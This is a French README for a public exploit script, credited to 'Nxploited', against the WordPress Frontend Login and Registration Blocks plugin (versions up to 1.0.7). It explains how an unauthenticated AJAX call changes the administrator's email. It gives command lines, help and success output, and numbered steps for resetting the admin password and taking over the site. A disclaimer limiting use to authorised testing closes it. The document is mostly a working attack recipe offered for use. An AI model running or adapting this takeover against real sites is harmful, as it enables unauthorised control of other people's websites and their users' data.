
WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 est vulnérable à l'escalade de privilèges.
Le plugin Frontend Login and Registration Blocks pour WordPress (versions <= 1.0.7) est vulnérable à une escalade de privilèges via une prise de contrôle de compte.
Le problème survient car le plugin ne valide pas l'identité de l'utilisateur lors de la mise à jour de détails sensibles comme l'email via la fonction flr_blocks_user_settings_handle_ajax_callback().
✅ Impact :
Un attaquant non authentifié peut changer l'email de l'administrateur, déclencher le processus "Mot de passe oublié", et réinitialiser le mot de passe admin, obtenant ainsi un contrôle total.
Le script Python inclus automatise le processus d'exploitation en ciblant le point de terminaison AJAX vulnérable :
/wp-admin/admin-ajax.php
Il met à jour l'email de l'utilisateur ciblé (généralement user_id 1 pour l'admin) avec un email contrôlé par l'attaquant.
Nom du fichier : CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Valeurs par défaut :
--user_id: 1 (admin par défaut)--mail: [email protected]Pour voir le menu d'aide, exécutez :
python CVE-2025-3605.py --help
Sortie :
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Exemple d'exécution :
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ En cas de succès :
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ En cas d'échec :
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Accédez à :
http://target-site/wordpress/wp-login.php
2️⃣ Saisissez le nouvel email que vous avez défini ([email protected]).
3️⃣ Demandez une réinitialisation du mot de passe.
4️⃣ Définissez un nouveau mot de passe.
5️⃣ Connectez-vous en tant qu'administrateur et profitez d'un accès complet.
Cet exploit et ce script sont fournis uniquement à des fins éducatives et de tests autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale et contraire à l'éthique.
Par : Khaled Alenazi (Nxploited)